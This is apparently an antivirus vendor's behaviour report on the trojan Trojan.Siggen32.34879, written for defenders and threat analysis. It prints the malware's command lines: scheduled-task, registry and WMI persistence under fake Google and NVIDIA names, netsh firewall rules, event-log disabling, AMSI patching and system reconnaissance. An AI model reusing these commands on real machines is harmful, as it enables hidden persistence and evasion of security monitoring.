Trojan.Siggen32.34879

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Google Update Agent' = '"%LOCALAPPDATA%\Microsoft\IdentityService\TextInputHost.exe" worker'
[HKCU\Environment] 'UserInitMprLogonScript' = '"%LOCALAPPDATA%\Microsoft\IdentityService\TextInputHost.exe" worker'

Creates or modifies the following files

<SYSTEM32>\tasks\nvcontainertask_wjc7xx9zcc
%APPDATA%\microsoft\windows\start menu\programs\startup\google update agent.lnk

Sets the following service settings

[HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'

Malicious functions

To bypass firewall, removes or modifies the following registry keys

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'DisableNotifications' = '00000001'
[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule "name=System Network Service" dir=in action=allow program=<SYSTEM32>\svchost.exe enable=yes profile=any
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule "name=System Network Service Out" dir=out action=allow program=<SYSTEM32>\svchost.exe enable=yes profile=any
'<SYSTEM32>\netsh.exe' advfirewall set allprofiles settings inboundusernotification disable

Patches code

in dll

textinputhost.exe process, dbgcore.dll module

in AMSI dll

000e3b5f.exe process, Amsi.dll module
textinputhost.exe process, Amsi.dll module

in NTDLL dll

000e3b5f.exe process, ntdll.dll module
textinputhost.exe process, ntdll.dll module

Modifies file system

Creates the following files

%TEMP%\000e3b5f.exe
%ALLUSERSPROFILE%\googleupdate\wjc7xx9zccfrxg3.lock
%LOCALAPPDATA%\microsoft\identityservice\textinputhost.exe
nul
%TEMP%\.mn_43375858395a4343.pid
%TEMP%\.wd_43375858395a4343.pid
%TEMP%\db-1788810558.tmp
%TEMP%\db-1823739615.tmp
%TEMP%\db-2858386452.tmp
%TEMP%\db-4187407985.tmp
%TEMP%\db-1425803191.tmp
%TEMP%\db-370002342.tmp

Deletes the following system files

%WINDIR%\prefetch\svchost.exe-109e4311.pf
%WINDIR%\prefetch\svchost.exe-2880d0c5.pf
%WINDIR%\prefetch\svchost.exe-4ba0e729.pf
%WINDIR%\prefetch\svchost.exe-5b3160c7.pf
%WINDIR%\prefetch\svchost.exe-6378753e.pf
%WINDIR%\prefetch\svchost.exe-7cfedea3.pf
%WINDIR%\prefetch\svchost.exe-80f4a784.pf
%WINDIR%\prefetch\svchost.exe-8f1093d6.pf
%WINDIR%\prefetch\svchost.exe-d217a328.pf

Deletes following files that it created itself

%TEMP%\000e3b5f.exe
%TEMP%\db-1823739615.tmp
%TEMP%\db-2858386452.tmp
%TEMP%\db-1788810558.tmp
%TEMP%\db-4187407985.tmp
%TEMP%\db-370002342.tmp
%TEMP%\db-1425803191.tmp

Network activity

Connects to

'<DNS_SERVER>':53
'cr###alxrat.net':443
'ap#.#pify.org':443
'ip##pi.com':80

TCP

HTTP GET requests

Other

'cr###alxrat.net':443
'ap#.#pify.org':443

UDP

DNS ASK cr###alxrat.net
DNS ASK ap#.#pify.org
DNS ASK ip##pi.com

Miscellaneous

Creates and executes the following

'%TEMP%\000e3b5f.exe'
'%LOCALAPPDATA%\microsoft\identityservice\textinputhost.exe' worker
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 2; Remove-Item -Force '%TEMP%\000e3b5f.exe' -ErrorAction SilentlyContinue"
'%LOCALAPPDATA%\microsoft\identityservice\textinputhost.exe' watchdog 4824

Executes the following

'<SYSTEM32>\schtasks.exe' /Create /TN NvContainerTask_WJC7XX9ZCC /TR "\"%LOCALAPPDATA%\Microsoft\IdentityService\TextInputHost.exe\" worker" /SC ONLOGON /RL HIGHEST /F
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "$ws=(New-Object -ComObject WScript.Shell).CreateShortcut('%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Google Update Agent.lnk');$ws.TargetPa...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$f=[wmiclass]\"root\subscription:__EventFilter\";$fi=$f.CreateInstance();$fi.Name='Google Update Agent_Filter';$fi.EventNamespac...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "wevtutil sl \"Microsoft-Windows-TaskScheduler/Operational\" /e:false 2>$null"
'<SYSTEM32>\wevtutil.exe' sl Microsoft-Windows-TaskScheduler/Operational /e:false
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-CimInstance Win32_Processor | Select-Object -ExpandProperty Name) -join ','"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "wevtutil sl \"Microsoft-Windows-Services/Diagnostic\" /e:false 2>$null"
'<SYSTEM32>\wevtutil.exe' sl Microsoft-Windows-Services/Diagnostic /e:false
'<SYSTEM32>\cmd.exe' /C wmic "path win32_VideoController get name"
'<SYSTEM32>\wbem\wmic.exe' "path win32_VideoController get name"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "Get-CimInstance -ClassName Win32_VideoController | Select-Object -ExpandProperty Name"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum).Sum"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName;'|||';(Get-CimInstance Win32_Processor | Select-Object -ExpandProperty Name) -join ',';'...
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$r=Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter \"Name='Google Update Agent_Filter'\" -ErrorAction Si...
'<SYSTEM32>\schtasks.exe' /Query /TN NvContainerTask_WJC7XX9ZCC
'%TEMP%\000e3b5f.exe' ' (with hidden window)
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule "name=System Network Service" dir=in action=allow program=<SYSTEM32>\svchost.exe enable=yes profile=any' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Create /TN NvContainerTask_WJC7XX9ZCC /TR "\"%LOCALAPPDATA%\Microsoft\IdentityService\TextInputHost.exe\" worker" /SC ONLOGON /RL HIGHEST /F' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "$ws=(New-Object -ComObject WScript.Shell).CreateShortcut('%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Google Update Agent.lnk');$ws.TargetPa...' (with hidden window)
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule "name=System Network Service Out" dir=out action=allow program=<SYSTEM32>\svchost.exe enable=yes profile=any' (with hidden window)
'<SYSTEM32>\netsh.exe' advfirewall set allprofiles settings inboundusernotification disable' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$f=[wmiclass]\"root\subscription:__EventFilter\";$fi=$f.CreateInstance();$fi.Name='Google Update Agent_Filter';$fi.EventNamespac...' (with hidden window)
'%LOCALAPPDATA%\microsoft\identityservice\textinputhost.exe' worker' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 2; Remove-Item -Force '%TEMP%\000e3b5f.exe' -ErrorAction SilentlyContinue"' (with hidden window)
'%LOCALAPPDATA%\microsoft\identityservice\textinputhost.exe' watchdog 4824' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "wevtutil sl \"Microsoft-Windows-TaskScheduler/Operational\" /e:false 2>$null"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-CimInstance Win32_Processor | Select-Object -ExpandProperty Name) -join ','"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "wevtutil sl \"Microsoft-Windows-Services/Diagnostic\" /e:false 2>$null"' (with hidden window)
'<SYSTEM32>\cmd.exe' /C wmic "path win32_VideoController get name"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "Get-CimInstance -ClassName Win32_VideoController | Select-Object -ExpandProperty Name"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum).Sum"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName;'|||';(Get-CimInstance Win32_Processor | Select-Object -ExpandProperty Name) -join ',';'...' (with hidden window)
'<SYSTEM32>\net.exe' session' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$r=Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter \"Name='Google Update Agent_Filter'\" -ErrorAction Si...' (with hidden window)
'<SYSTEM32>\schtasks.exe' /Query /TN NvContainerTask_WJC7XX9ZCC' (with hidden window)

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней